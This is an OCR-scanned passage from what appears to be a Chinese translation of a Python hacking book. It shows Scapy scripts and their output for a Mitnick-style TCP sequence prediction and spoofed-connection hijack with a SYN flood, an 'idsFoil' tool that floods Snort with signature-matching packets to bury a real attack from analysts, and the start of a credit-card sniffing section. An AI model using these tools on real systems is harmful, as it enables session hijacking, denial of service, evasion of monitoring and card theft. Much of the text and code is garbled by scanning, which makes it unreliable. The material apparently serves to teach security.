1382726994:1382726994(0) win 4096 

14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996: S 
2022336000: 2022336000(0) ack 1382726995 win 4096 
14:18:28.305578 apollo.it.luc.edu.996 > x-terminal.shell: R 
1382726995:1382726995(0) win 0 

14:18:28.564333 apollo.it.luc.edu.995 > x-terminal.shell: S 
1382726995:1382726995(0) win 4096 

14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995: S 
2022464000: 2022464000(0) ack 1382726996 win 4096 
14:18:28.811591 apollo.it.luc.edu.995 > x-terminal.shell: R 
1382726996 :1382726996(0) win 0 

<..SNIPPED. ,> 


为 了 在 Python 中 重 现 ， 我 们 将 发 送 TCP SYN 数 据 包 并 等 待 TCP SYN-ACK 数 据 包 。 
— EKF] > RATE MACK F HA TCP FS Hat Sl RRL o RINE RAK AL 
一 个 规律 的 存在 。 注 意 ， 使 用 Scapy ， 我 们 不 需要 完整 的 TCP 和 |P 字 

段 : Scapy 将 用 值 卉 充 他 们 。 此 外 ， 它 将 从 我 们 默认 的 源 地 址 发 送 。 我 们 的 新 却 
数 callSYN() 将 会 接受 一 个 IP 地 址 返回 写 一 个 ACK 序 列 号 (当前 的 序列 号 加 上 变 
化 ) 。 


from scapy.all import * 
def calTSN(tgt): 
seqNum = 0 
preNum = 0 
diffSeq = 0 
for x in range(i, 5): 
if preNum != 0: 
preNum = seqNum 
pkt = IP(dst=tgt)) / TCP() 
ans = sri(pkt, verbose=0) 
seqNum = ans.getlayer(TCP).seq 
diffSeq = seqNum - preNum 
print '[+] TCP Seq Difference: ' + str(diffSeq) 
return seqNum + diffSeq 


tgt = "192.168.1.106" 
seqNum = calTSN(tgt) 
print "[+] Next TCP Sequence Number to ACK is: "+str(seqNum+1) 


运行 我 们 的 代码 攻击 一 个 脆弱 的 目标 ， 我 们 可 以 看 到 TCP 系 列 号 的 随机 性 是 不 存在 
的 ， 目 标 和 Shimomura 的 机 器 有 相同 的 序列 号 差 值 。 注 意 ， 默 认 情 况 

下 ， Scapy 会 使 用 默认 的 目标 TCP 端 口 80。 目 标 必 须 有 一 个 服务 正在 监听 ， 不 管 
你 尝试 欺骗 连接 那个 端口 。 


mitnick# python calculateTSN.py 

[+] TCP Seq Difference: 128000 

[+] TCP Seq Difference: 128000 

[+] TCP Seq Difference: 128000 

[+] TCP Seq Difference: 128000 

[+] Next TCP Sequence Number to ACK is: 2024371201 


其 骗 TCP 连 接 


有 了 正确 的 TCP 序 列 号 在 手 ， 米 特 尼克 可 以 攻击 了 。 米 特 尼克 使 用 的 序列 号 

是 2024371200 ， 大 约 初始 化 SYN 后 的 150 个 SYN 数 据 包 发 送 过 去 用 来 侦查 。 首 
先 ， 它 从 新 的 沉默 服务 器 欺骗 了 一 个 连接 。 然 后 他 发 送 了 一 个 序列 号 

是 2024371201 盲目 的 ACK 数 据 包 ， 表 明 已 经 建立 了 正确 的 连接 。 


14:18:36.245045 server.login > x-terminal.shell: S 
1382727010:1382727010(0) win 4096 

14:18:36.755522 server.login > x-terminal.shell: .ack2024384001 wir 
4096 


E R] 








在 Python 中 重 现 这 些 ， 我 们 将 生成 和 发 送 两 个 数据 包 。 首 先 我 们 创建 一 个 TCP 源 端 
口 是 513 和 目的 端口 是 514 的 源 |P 地 址 是 欺骗 的 服务 器 目的 IP 地 址 是 目标 IP 地 址 的 
SYN 数 据 包 ， 接 下 来 ， 我 们 创建 一 个 相同 的 ACK 数 据 包 ， 增 加 计算 的 序列 号 作为 额 
外 的 字段 ， 并 发 送 它 。 


from scapy.all import * 
def spoofConn(src, tgt, ack): 
IPlayer = IP(src=src, dst=tgt) 
TCPlayer = TCP(sport=513, dport=514) 
synPkt = IPlayer / TCPlayer 
send(synPkt ) 
IPlayer = IP(src=src, dst=tgt) 
TCPlayer = TCP(Sport=513, dport=514, ack=ack) 
ackPkt = IPlayer / TCPlayer 
send(ackPkt ) 


SEG = 10st 

tgt = "192.168.1.106" 
seqNum = 2024371201 
spoofConn(src, tgt, seqNum) 


将 全 部 代码 整合 在 一 起 ， 我 们 将 增加 一 些 命令 行 选 项 解析 来 指定 要 欺骗 连接 的 地 
址 ， 目 标 服 务 器 ， 和 欺骗 地 址 的 初始 化 SYN 洪 水 攻击 。 


# coding=UTF-8 
import optparse 
from scapy.all import * 


#SYN 洪 水 攻击 
def synFlood(src, tgt): 
for sport in range(1024, 65535): 
IPlayer = IP(src=src, dst=tgt) 
TCPlayer = TCP(sport=sport, dport=513) 
pkt = IPlayer / TCPlayer 
send(pkt) 
# 预 测 TCP 序 列 号 
def calTSN(tgt): 
seqNum = 0 
preNum = 0 
diffSeq = 0 
for x in range(1, 5): 
if preNum != 0: 
preNum = seqNum 
pkt = IP(dst=tgt) / TCP() 
ans = sri(pkt, verbose=0) 
seqNum = ans.getlayer(TCP).seq 
diffSeq = seqNum - preNum 
print '[+] TCP Seq Difference: ' + str(diffSeq) 
return seqNum + diffSeq 
# 发 送 ACK 坎 骗 包 


def spoofConn(src, tgt, ack): 
IPlayer = IP(src=src, dst=tgt) 
TCPlayer = TCP(sport=513, dport=514) 
synPkt = IPlayer / TCPlayer 
send(synPkt ) 
IPlayer = IP(src=src, dst=tgt) 
TCPlayer = TCP(sport=513, dport=514, ack=ack) 
ackPkt = IPlayer / TCPlayer 
send(ackPkt ) 
def main(): 
parser = optparse.OptionParser('usage%prog -s<src for SYN Flooc 
parser.add_option('-s', dest='synSpoof', type='string', help=': 
parser.add_option('-S', dest='srcSpoof', type='string', help='s 
parser.add_option('-t', dest='tgt', type='string', help='specili 
(options, args) = parser.parse_args() 
if options.synSpoof == None or options.srcSpoof == None or opt: 
print(parser.usage) 
exit(0) 
else: 
synSpoof = options.synSpoof 
srcSpoof = options.srcSpoof 
tgt = options.tgt 
print('[+] Starting SYN Flood to suppress remote server.') 
synFlood(synSpoof, srcSpoof) 
print('[+] Calculating correct TCP Sequence Number. ') 
seqNum = calTSN(tgt) + 1 
print('[+] Spoofing Connection. ') 
spoofConn(srcSpoof, tgt, seqNum) 
print('[+] Done.') 


if name == '_main_': 


main() 
EE) 


运行 我 们 最 终 的 脚本 ， 我 们 成 功 复制 了 米 特 尼克 20 年 前 的 攻击 。 一 度 被 认为 是 史上 
最 复杂 的 攻击 现在 被 我 们 用 几 十 行 Python 代码 重 现 。 现 在 手 上 有 了 较 强 的 分 析 技 
能 ， 让 我 们 用 到 下 一 节 描 述 的 方法 ， 一 个 针对 入 侵 检 测 系 统 的 复杂 网 络 攻击 的 分 
析 。 





mitnick# python tcpHijack.py -s 10.1.1.2 -S 192.168.1.2 -t 192.168 
[+] Starting SYN Flood to suppress remote server. 


Sent 1 packets. 
Sent 1 packets. 


Sent 1 packets. 

<,..SNIPPED. ,> 

[+] Calculating correct TCP Sequence Number. 
[+] TCP Seq Difference: 128000 

[+] TCP Seq Difference: 128000 

[+] TCP Seq Difference: 128000 

[+] TCP Seq Difference: 128000 

[+] Spoofing Connection. 


Sent 1 packets. 


Sent 1 packets. 
[+] Done. 


[Esc 





A Scapy## KARE AK 


入 侵 检测 系统 (IDS) 是 主管 分 析 师 手中 一 个 非常 有 价值 的 工具 。 一 个 基于 网 络 的 入 侵 
令 测 系统 (NIDS) 可 以 通过 记录 IP 网 络 数据 包 实 时 分 析 流 量 。 通 过 匹配 已 知 恶意 标记 
的 数据 包 ，IDS 可 以 在 攻击 成 功 之 前 提醒 网 络 分 析 师 。 比 如 说 ，Snort 入 侵 检测 系统 
通过 预先 包装 各 种 不 同 的 规则 来 检测 不 同类 型 的 侦查 ， 攻 击 ， 拒 绝 服务 等 其 他 不 同 
的 攻击 向 量 。 审 查 其 中 一 个 配置 的 内 容 ， 我 们 看 到 四 个 报警 检测 TFN，tfn2k 和 

Trin00 分 布 式 拒绝 服务 的 攻击 工具 。 当 攻击 者 使 用 TFN, tfn2k 或 者 Trin00 工 具 攻 击 
目标 ，1IDS 检 测 到 攻击 然后 警告 分 析 师 。 然 而 ， 当 分 析 师 接受 比 他 们 能 分 辩 事 件 还 
要 多 的 警告 时 他 该 怎么 办 ? 他 们 往往 不 知 所 措 ， 可 能 会 错过 重要 的 攻击 细节 。 


victim# cat /etc/snort/rules/ddos.rules 

<. -SNIPPED .> 

alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"DDOS TFN Probe' 
icmp_id:678; itype:8; content:"1234"; reference:arachnids, 443; 
classtype:attempted-recon; sid:221; rev:4;) 

alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"DDOS tfn2k icmt 
possible communication"; icmp_id:0; itype:0; content: "AAAAAAAAAA"; 
reference:arachnids, 425; classtype:attempted-dos; sid:222; rev:2;) 
alert udp $EXTERNAL_NET any -> $HOME_NET 31335 (msg:"DDOS Trin00 
Daemon to Master PONG message detected"; content:"PONG"; 
reference:arachnids,187; classtype:attempted-recon; sid:223; rev:3, 
alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"DDOS 

TFN client command BE"; icmp_id:456; icmp_seq:0; itype:0; 
reference:arachnids,184; classtype:attempted-dos; sid:228; rev:3;) 
<. SNIPPED > 





为 了 对 分 析 师 隐藏 一 个 合法 的 攻击 ， 我 们 将 编写 一 个 工具 生成 大 量 的 警告 让 分 析 师 
去 处 理 。 此 外 ， 分 析 师 能 够 使 用 这 个 工具 来 验证 一 个 IDS 能 正确 的 识别 恶意 流量 。 
编写 这 个 脚本 并 不 难 ， 我 们 已 经 有 了 生成 警告 的 规则 。 为 此 ， 我 们 将 再 次 使 

用 Scapy 制作 数据 包 。 考 虑 到 DDos TFN 的 第 一 条 规则 ， 我 们 必须 生成 一 个 ICMP 
数据 包 ，ICMP ID 是 678，ICMP 类 型 是 8 包含 原始 内 容 '1234' 的 数据 包 。 使 

用 Scapy ， 我 们 用 这 些 变 量 制作 数据 包 并 发 送 他 们 到 我 们 的 目的 地 址 。 此 外 ， 我 
们 建立 其 他 三 个 规则 的 数据 包 。 


from scapy.all import * 

def ddosTest(src, dst, iface, count): 
pkt=IP(src=src,dst=dst )/ICMP(type=8, id=678 ) /Raw(load='1234' ) 
send(pkt, iface=iface, count=count) 
pkt = IP(src=src, dst=dst )/ICMP(type=0 )/Raw( load='AAAAAAAAAA' ) 
send(pkt, iface=iface, count=count) 
pkt = IP(src=src, dst=dst ) /UDP(dport=31335 ) /Raw(load='PONG' ) 
send(pkt, iface=iface, count=count) 
pkt = IP(src=src, dst=dst )/ICMP(type=0, id=456) 
send(pkt, iface=iface, count=count) 


Sre="153.3.0" 
dst="192.168.1.106" 
iface="etho" 

count=1 
ddosTest(src, dst, iface, count ) 


[| 


运行 该 脚本 ， 我 们 看 到 ， 四 个 数据 包 发 送 到 了 目的 地 址 。|IDS 将 会 分 析 这 些 数据 包 
并 生成 敬告， 如 果 他 们 匹配 正确 的 话 。 


attacker# python idsFoil.py 
Sent 1 packets. 

.Sent 1 packets. 

Sent 1 packets. 

Sent 1 packets. 


检查 Snort 的 警告 日 志 ， 我 们 发 现 我 们 成 功 了 ! 所 有 四 个 数据 包 生 成 的 警告 全 部 IDS 
系统 中 。 


victim# snort -q -A console -i ethO -c /etc/snort/snort.conf 
03/14-07:32:52.034213 [**] [1:221:4] DDOS TFN Probe [**] 
[Classification: Attempted Information Leak] [Priority: 2] {ICMP} 
1.3.3.7 -> 192.168.1.106 

03/14-07 :32:52.037921 [**] [1:222:2] DDOS tfn2k icmp possible 
communication [**] [Classification: Attempted Denial of Service] 
[Priority: 2] {ICMP} 1.3.3.7 -> 192.168.1.106 
03/14-07:32:52.042364 [**] [1:223:3] DDOS Trin00 Daemon to Master 上 
message detected [**] [Classification: Attempted Information Leak] 
[Priority: 2] {UDP} 1.3.3.7:53 -> 192.168.1.106:31335 

03/14-07 :32:52.044445 [**] [1:228:3] DDOS TFN client command BE [*: 
[Classification: Attempted 





让 我 们 看 看 稍微 复杂 的 规则 ，Snort 下 的 exploit.rules 签名 文件 。 在 这 里 ， 一 系 
列 的 特殊 字 节 将 会 为 ntalkd x86 Linux 溢 出 和 Linux mountd 溢 出 生成 警告 。 


alert udp $EXTERNAL_NET any -> $HOME_NET 518 (msg:"EXPLOIT ntalkd > 
Linux overflow"; content:"|01 03 00 00 00 00 00 01 00 02 02 E8|"; 
reference: bugtraq, 210; classtype:attempted-admin; sid:313; 

rev:4;) 

alert udp $EXTERNAL_NET any -> $HOME_NET 635 (msg:"EXPLOIT x86 Lint 
mountd overflow"; content:"4|BO 02 89 06 FE C8 89|F|04 BO 06 89|F", 
reference: bugtraq,121; reference:cve, 1999-0002; classtype 
:attempted-admin; sid:315; rev:6;) 





为 了 生成 包含 原始 字 节 的 数据 包 ， 我 们 将 利用 \x 后 面 跟随 16 进 制 字符 来 编码 字 

节 。 在 第 一 个 警报 ， 会 生成 一 个 数据 包 将 会 被 ntalkd Linux 溢 出 签名 所 检测 到 。 第 
二 个 数据 包 ， 我 们 将 接合 16 进 制 编码 和 标准 的 ASCII 字 符 。 注 意 98|F| 编码 

A \x89 标示 包含 了 原始 的 字 节 加 了 一 个 ASCII 字 符 。 下 面 的 数据 包 将 在 试图 攻击 
时 生成 报警 。 


def exploitTest(src, dst, iface, count): 
pkt = IP(src=src, dst=dst) / UDP(dport=518) /Raw(load="\x01\x0: 
send(pkt, iface=iface, count=count) 
pkt = IP(src=src, dst=dst) / UDP(dport=635) /Raw(load="4\xBO\x( 
send(pkt, iface=iface, count=count) 





q 


Re? CAIRR haka e Eea h o SRNKESnotH ia RAN RAAR, 
们 可 以 制作 数据 包 的 规则 。 两 个 规则 通过 特定 的 端口 和 特定 原始 内 容 的 UDP 协议 检 
测 和 恶意 行为 。 很 容易 制作 这 种 数据 包 。 





alert udp $EXTERNAL_NET any -> $HOME_NET 7 (msg:"SCAN cybercop udp 
bomb"; content:"cybercop"; reference:arachnids, 363; classtype: bad- 
unknown; sid:636; rev:1;) 

alert udp $EXTERNAL_NET any -> $HOME_NET 10080:10081 (msg:"SCAN Amé 
client version request"; content:"Amanda"; nocase; classtype:attem 
recon; sid:634; rev:2;) 


a 一 一 全 


我 们 生成 两 个 对 应 规则 的 扫描 工具 的 数据 包 。 当 生成 两 个 合适 的 UDP 数据 包 之 后 我 
们 发 送 到 目标 主机 。 





def scanTest(src, dst, iface, count): 
pkt = IP(src=src, dst=dst) / UDP(dport=7) /Raw(load='cybercop'' 
send(pkt) 
pkt = IP(src=src, dst=dst) / UDP(dport=10080) /Raw(load='Amandé 
send(pkt, iface=iface, count=count) 


| o z 


WE > RMA ŽE LTE ABBR GAH AA h da a E o RAE 
代码 组 合 在 一 起 ， 添 加 一 些 选项 解析 。 注 意 ， 用 户 必须 输入 目标 地 址 否则 程序 会 退 
出 。 如 果 用 户 没有 输入 源 地 址 ， 我 们 会 生成 一 个 随机 的 源 地 址 。 如 果 用 户 不 能 指定 
发 送 制作 的 数据 包 多 少 次 ， 我 们 将 只 发 送 一 次 。 该 脚本 使 用 缺 省 的 网 卡 eth0， 除 非 
用 户 指定 。 虽 然 我 们 的 目的 文本 很 短 ， 你 可 以 继续 添加 脚本 生成 测试 其 他 攻击 类 型 
的 警告 。 





# coding=UTF-8 

import optparse 

from scapy.all import * 
from random import randint 


def ddosTest(src, dst, iface, count): 
pkt=IP(src=src,dst=dst)/ICMP(type=8, id=678 )/Raw(load='1234' ) 
send(pkt, iface=iface, count=count) 
pkt = IP(src=src, dst=dst )/ICMP(type=0 )/Raw( load='AAAAAAAAAA' ) 
send(pkt, iface=iface, count=count) 
pkt = IP(src=src, dst=dst ) /UDP(dport=31335 )/Raw(load='PONG' ) 


send(pkt, iface=iface, count=count) 
pkt = IP(src=src,dst=dst )/ICMP(type=0, id=456) 
send(pkt, iface=iface, count=count) 


def exploitTest(src, dst, iface, count): 
pkt = IP(src=src, dst=dst) / UDP(dport=518) /Raw(load="\x01\x0: 
send(pkt, iface=iface, count=count) 
pkt = IP(src=src, dst=dst) / UDP(dport=635) /Raw(load="4\xBO\x( 
send(pkt, iface=iface, count=count ) 


def scanTest(src, dst, iface, count): 
pkt = IP(src=src, dst=dst) / UDP(dport=7) /Raw(load='cybercop'' 
send(pkt) 
pkt = IP(src=src, dst=dst) / UDP(dport=10080) /Raw(load='Amandé 
send(pkt, iface=iface, count=count) 


def main(): 
parser = optparse.OptionParser('usage%prog -i<iface> -s <src> - 
parser.add_option('-i', dest='iface', type='string', help='spec 
parser.add_option('-s', dest='src', type='string', help='specit 
parser.add_option('-t', dest='tgt', type='string', help='specili 
parser.add_option('-c', dest='count', type='int', help='specif\ 
(options, args) = parser.parse_args() 


if options.iface == None: 
iface = 'etho' 

else: 
iface = options.iface 

if options.src == None: 
src = '.'.join([str(randint(1,254)) for x in range(4)]) 

else: 
src = options.src 

if options.tgt == None: 
print(parser.usage) 
exit(0) 

else: 
dst = options.tgt 

if options.count == None: 
count = 1 

else: 


count = options.count 
ddosTest(src, dst, iface, count) 
exploitTest(src, dst, iface, count) 
scanTest(src, dst, iface, count) 


if _name_ == '_main_': 


main() 
OS ey 


执行 我 们 最 终 的 脚本 ， 我 们 可 以 看 到 它 正 确 的 发 送 了 和 八 个 数据 包 到 目标 地 址 ， 欺 骗 
源 地 址 为 1.3.3.7 。 为 了 测试 目的 ， 确 保 目 标 主机 和 攻击 者 的 机 器 不 同 。 





attacker# python idsFoil.py -i ethO -s 1.3.3.7 -t 192.168.1.106 -c 
Sent 1 packets. 
Sent 1 packets. 


Sent 1 packets. 
Sent 1 packets. 
Sent 1 packets. 
Sent 1 packets. 
Sent 1 packets. 
Sent 1 packets. 


«| a 








AMIDSH AS? RMA CRRA TAE E Ae RAT! 我 们 的 工具 包 
工作 了 ， 本 章 结束 | 


victim# snort -q -A console -i ethO -c /etc/snort/snort.conf 

03/14-11:45:01.060632 [**] [1:222:2] DDOS tfn2k icmp possible 
communication [**] [Classification: Attempted Denial of Service 
[Priority: 2] {ICMP} 1.3.3.7 -> 192.168.1.106 

03/14-11:45:01.066621 [**] [1:223:3] DDOS Trin00 Daemon to Master 上 
message detected [**] [Classification: Attempted Information Le 
[Priority: 2] {UDP} 1.3.3.7:53 -> 192.168.1.106:31335 

Q3/14-11:45:01.069044 [**] [1:228:3] DDOS TFN client command BE [*: 
[Classification: Attempted Denial of Service] [Priority: 2] {I( 
1.3.3.7 -> 192.168.1.106 

03/14-11:45:01.071205 [**] [1:313:4] EXPLOIT ntalkd x86 Linux overt 
[**] [Classification: Attempted Administrator Privilege Gain] 
[Priority: 1] {UDP} 1.3.3.7:53 -> 192.168.1.106:518 

03/14-11:45:01.076879 [**] [1:315:6] EXPLOIT x86 Linux mountd overt 
[**] [Classification: Attempted Administrator Privilege Gain] 
[Priority: 1] {UDP} 1.3.3.7:53 -> 192.168.1.106:635 

03/14-11:45:01.079864 [**] [1:636:1] SCAN cybercop udp bomb [**] 
[Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 
1.3.3.7:53 -> 192.168.1.106:7 

03/14-11:45:01.082434 [**] [1:634:2] SCAN Amanda client version rec 
[**] [Classification: Attempted Information Leak] [Priority: 2. 

{UDP} 1.3.3.7:53 -> 192.168.1.106:10080 


图 — 
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茶 喜 你 ! 我 们 在 这 一 章 编写 了 相当 多 的 工具 用 来 分 析 网 络 流量 。 我 们 从 编写 简单 的 
仿 测 极光 攻击 工具 开始 。 接 下 来 ， 我 们 编写 了 一 些 脚 本 来 检测 Anonymous“ # 7822 
的 LOIC 工 具 的 攻击 。 接 下 来 ， 我 们 重 现 了 7 岁 的 Moore 用 来 检测 五 角 大 楼 的 诱饵 扫 

描 程 序 。 接 下 来 ， 我 们 创建 了 一 些 脚 本 用 来 检测 利用 DNS 作为 攻击 向 量 的 攻击 。 包 
括 Storm 和 Conficker 蠕 虫 。 有 了 分 析 流 量 的 能 力 ， 我 们 重 现 了 20 年 前 米 特 尼克 用 于 


ai 。 最 后 ， 我 们 利用 我 们 的 网 络 分 析 技 能 伪造 数据 包 挫 败 了 入 侵 检 测 系 
B 


ED | 





希望 本 章 为 您 提供 了 极 好 的 网 络 流量 分 析 技 能 。 在 下 一 章 我 们 编写 无 线 网 络 审计 和 
移动 设备 的 工具 时 这 些 技 能 是 有 用 的 。 


PRE 无 线 攻击 


本 章 内 容 : 


| 噢 探 无 线 网 络 的 私人 信息 

.监听 请 求 网 络 和 识别 隐藏 的 无 线 网 络 

.控制 无 线 无 人 机 

. 确认 Firesheep 的 使 用 

潜入 蓝牙 设备 

.利用 蓝牙 漏洞 进行 渗 迁 

知识 的 增长 并 不 是 和 树 一 样 ， 种 植 一 棵 树 ， 你 只 要 把 它 放 进 地 里 ， 盖 上 点 土 ; 


定期 为 他 浇 水 就 行 。 知 识 的 增长 却 伴随 着 时 间 ， 工 作 和 长 期 的 努力 。 除 此 之 
外 ， 不 能 用 任何 手段 获得 知识 。 


OnRWN= 


一 美国 举 击 顶级 大 师 ，Ed Parker 


简介 : 无 线 安 全 和 冰 人 


2007 年 5 月 ， 美 国 特勤 局 建 捕 了 一 名 无 线 黑客 Max Ray Butler > IRAKA ° Mr. 
Butler 通 过 一 个 网 站 销售 了 成 午 上 万 的 信用 卡 账户 信息 。 但 是 他 是 怎样 收集 这 些 私 
人 信息 的 ? 噢 探 未 加 密 的 无 线 网 络 连接 被 证 明 是 他 获取 信用 卡 账 户 信息 的 方法 之 
一 。 它 使 用 假 身份 租用 酒店 房间 和 公 寅 ， 然 后 使 用 大 功率 的 天 线 拦截 酒店 和 附近 公 
寅 的 无 线 接 入 点 的 通讯 ， 以 捕捉 客人 的 私人 信息 。 很 多 时 候 ， 媒 体 专家 分 类 这 种 攻 
击 为 “精细 的 和 复杂 的 ”。 这 样 的 描述 是 危险 的 ， 因 为 我 们 可 以 用 短 的 Python 脚本 来 
执行 这 种 攻击 。 正 如 下 面 章 节 您 将 看 到 的 ， 我 们 可 以 用 不 到 25 行 代码 嗅 探 信用 卡 账 
户 信 息 ， 但 是 在 开始 之 前 ， 我 们 应 确保 我 们 的 环境 设置 正确 。 


设置 你 的 无 线 攻击 环境 


在 下 面 的 章节 中 ， 我 们 将 编写 代码 嗅 探 无 线 网 络 流量 并 发 送 802.11 数 据 帧 。 我 们 将 
使 用 一 个 增益 Hi-Gain USB 无 线 网 络 适 配器 和 网 络 放大 器 来 创建 和 测试 本 章 脚本 。 
在 BackTrack5 中 的 默认 网 卡 驱 动 允许 用 户 进 入 混杂 模式 并 发 送 原始 数据 帧 。 此 外 ， 
它 还 包含 一 个 外 部 天 线 连接 ， 能 够 让 我 们 附加 大 功率 天 线 。 


用 Scapy 测 试 捕获 无 线 网 络 


将 无 线 网 卡 设置 到 混杂 模式 ， 我 们 使 用 aircrack-ng 工具 套件 ， 使 
用 iwconfig 命令 列 出 我 们 的 无 线 网 络 适 配器 。 接 下 来 ， 我 们 运行 命 
令 airmon-ng start wlang 开启 混杂 模式 。 这 将 创建 一 个 新 的 mon0 适 配器 。 


attacker# iwconfig wlan0d 
wlanO IEEE 802.11bgn ESSID:off/any 
Mode:Managed Access Point: Not-Associated 
Retry long limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management:on 
attacker# airmon-ng start wlan0 
Interface Chipset Driver 
wlano Ralink RT2870/3070 rt2800usb - [phyg] 
(monitor mode enabled on mon0) 


让 我 们 快速 测试 ， 我 们 可 以 捕获 无 线 网 络 流量 在 将 网 卡 设 置 为 混杂 模式 之 后 。 注 
意 ， 我 们 设置 新 创建 的 监控 接口 mon0 到 我 们 的 conf .iface 。 监 听 到 每 个 数据 
包 ， 脚 本 将 运行 ptkPrint() 有 函数。 如 果 数 据 包 包含 802.11 标 识 ，802.11 响 应 ， 
TCP 数 据 包 或 DNS 流量 程序 将 打印 一 个 消息 。 


from scapy.all import * 


def pktPrint(pkt): 
if pkt.haslayer(Dot11Beacon): 
print('[+] Detected 802.11 Beacon Frame ) 
elif pkt.haslayer(Dot11ProbeReq): 
print('[+] Detected 802.11 Probe Request Frame' ) 
elif pkt.haslayer(TCP): 
print('[+] Detected a TCP Packet’) 
elif pkt.haslayer(DNS): 
print('[+] Detected a DNS Packet') 
conf.iface = 'mond' 
sniff (prn=pktPrint ) 


运行 脚本 后 ， 我 们 可 以 看 到 一 些 流 量 。 发 现 的 流量 包括 802.11 了 寻找 网 络 的 探测 请 
求 ，802.11 指 示 帧 流量 ， 和 DNS“，TCP 数 据 包 。 从 这 一 点 上 我 们 看 到 我 们 的 网 卡 工 
YET © 


安装 Python 的 蓝牙 包 


在 本 章 我 们 将 覆盖 一 些 蓝牙 攻击 。 为 了 编写 Python 的 蓝牙 脚本 ， 我 们 将 利用 Python 
绑 定 到 LInux Bluez 的 应 用 程序 接口 和 obexftp API ° 4# 


人 > Ag 


用 apt-get install 来 安装 。 


attacker# sudo apt-get install python-bluez bluetooth python-obexfi 
Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

<,.SNIPPED. ,> 

Unpacking bluetooth (from .../bluetooth_4.60-Qubuntu8_all.deb) 
Selecting previously deselected package python-bluez. 

Unpacking python-bluez (from .../python-bluez_0.18-1_amd64.deb) 
Setting up bluetooth (4.60-Qubuntu8) 

Setting up python-bluez (0.18-1) 

Processing triggers for python-central . 


«| = 








此 外 ， 我 们 必须 获取 一 个 蓝牙 设备 。 最 新 的 Cambridge Silicon Radio (CSR) 沁 片 组 
在 LInux 下 工作 的 很 好 。 本 章节 中 的 脚本 ， 我 们 将 使 用 SENA Parani UD100 USB 
牙 适配器 ， 为 了 测试 操作 系统 是 否 识 别 该 设备 ， 运行 hciconfig 配置 命令 ， 这 将 
打印 出 蓝牙 设备 的 详细 信息 。 


attacker# hciconfig 

hci0: Type: BR/EDR Bus: USB 
BD Address: 00:40:12:01:01:00 ACL MTU: 8192:128 
UP RUNNING PSCAN 
RX bytes:801 acl:0 sco:0 events:32 errors:0 

TX bytes:400 acl:0 sco:0 commands:32 errors:0 


在 本 草 中 ， 我 们 将 伪造 和 截取 蓝牙 帧 。 我 会 在 后 面 的 章节 中 在 此 提 到 ， 但 是 知道 
BackTrack5 r1 中 有 一 个 小 错误 ， 它 缺乏 一 个 重要 的 内 核 模 块 发 送 原始 的 蓝牙 数据 
包 ， 因 为 这 个 原因 ， 你 必须 升级 你 的 系统 或 内 核 到 BackTrack5 r2。 


下 面 的 章节 将 很 精彩 。 我 们 将 嗅 探 应 用 卡 信 息 ， 用 户 证 书 ， 远 程 操纵 无 人 机 ， 辨 认 


无 线 黑 容 ， 和 追踪 并 光 透 蓝牙 设备 。 请 经 常 检查 有 关 监 听 无 线 网 络 和 蓝牙 的 法 律 信 
Be 


绵羊 墙 --- 被 动 的 监听 无 线 网 络 的 秘密 


自从 2011 年 ， 绵 羊 墙 已 经 成 为 了 DEFCON 安 全 会 议 的 一 部 分 了 。 被 动 的 ， 团 队 监 听 
用 户 登 陆 的 邮件 ， 网 站 或 者 其 他 的 网 络 服务 ， 而 没有 任何 的 保护 和 加 密 。 当 团队 检 
测 到 任何 的 赁 证， 他 们 将 把 赁 eae T 近年 来 团队 增加 了 一 个 
项 目 叫 BE ， 显示 出 无 线 通 讯 流量 的 图 像 。 尽 管 是 善意 的 ， 团 队 很 好 的 演示 

了 黑客 是 怎样 捕获 到 相同 的 信息 的 。 在 下 面 的 章节 中 ,我 们 将 创建 建 几 个 攻击 从 空气 

E th 丛 有 趣 的 信息 。 


使 用 Python 的 正则 表达 式 嗅 探 信用 卡 


在 噢 探 无 线 网 络 的 信用 卡 信息 之 前 ， 快 速 的 回顾 正则 表达 式 是 很 有 用 的 。 正 则 表达 
式 提 供 了 匹配 特定 文本 中 的 字符 串 的 方法 。Python 提 供 了 关于 正则 表达 式 的 模块 
(re je 


(正则 表达 式 具 体 规则 咯 ) 


攻击 者 可 以 使 用 正则 表达 式 来 匹配 信用 卡号 码 。 为 了 简化 我 们 的 脚本 ， 我 们 将 使 用 
三 大 信用 卡 : Visa, MasterCard, 和 American Express。 如 果 你 想 了 解 更 多 的 关于 编 
写 信用 卡 的 正则 表达 式 的 知识 ， 可 以 访问 包含 其 他 厂商 的 占 则 表达 式 的 网 站 : 
http://www.regular-expressions.info/creditcard.html 。 美 国运 通信 用 卡 以 34 或 者 37 
开头 共 15 位 数字 。 让 我 们 编写 一 个 小 函数 检查 字符 串 确认 它 是 否 包 含 美国 运通 信用 
卡号 。 如 果 和 包含， 我 们 将 打印 该 信息 在 屏幕 上 ， 注 意 下 面 的 正则 表达 式 ， 它 确保 信 
用 卡 必须 以 3 开头 ， 后 面 跟随 着 4 或 者 7， 接 下 来 正则 表达 式 匹 配 13 位 数字 确保 共 15 
位 长 。 


import re 
def findCreditCard(raw): 
americaRE= re.findall("3[47][0-9]{13}", raw) 
if americaRE: 
print("[+] Found American Express Card: "+americaRE[0] ) 


def main(): 


tests.append('I would like to buy 1337 copies of that dvd') 
tests.append('Bill my card: 378282246310005 for \$2600' ) 
for test in tests: 
findCreditCard(test) 
if _name == " main_": 
main() 


运行 我 们 的 测试 程序 ， 我 们 看 到 它 正 确 的 找到 了 信用 卡号 码 。 


attacher$ python americanExpressTest.py 
[+] Found American Express Card: 378282246310005 


现在 ， 探 究 正 则 表达 式 必 须 找到 MasterCards 和 Visa 的 信用 卡号 。MasterCards 的 信 
用 卡号 以 51 或 者 55 开 头 共 16 位 数 。Visa 的 信用 卡号 以 4 开头 ， 并 且 13 位 或 者 16 位 数 
字 。 让 我 们 扩展 我 们 的 函数 找到 MasterCard 和 Visa 信 用 卡号 。 注 意 ，MasterCard 信 
用 卡号 正则 表达 式 匹 配 5 后 面 跟 着 1 或 者 5 接着 14 位 共 16 位 。Visa 正 则 表达 式 以 4 开头 
后 面 跟着 12 更 多 的 数 ， 我 们 将 在 接受 0 或 者 3 位 数 来 确保 13 位 或 者 16 位 数 。 


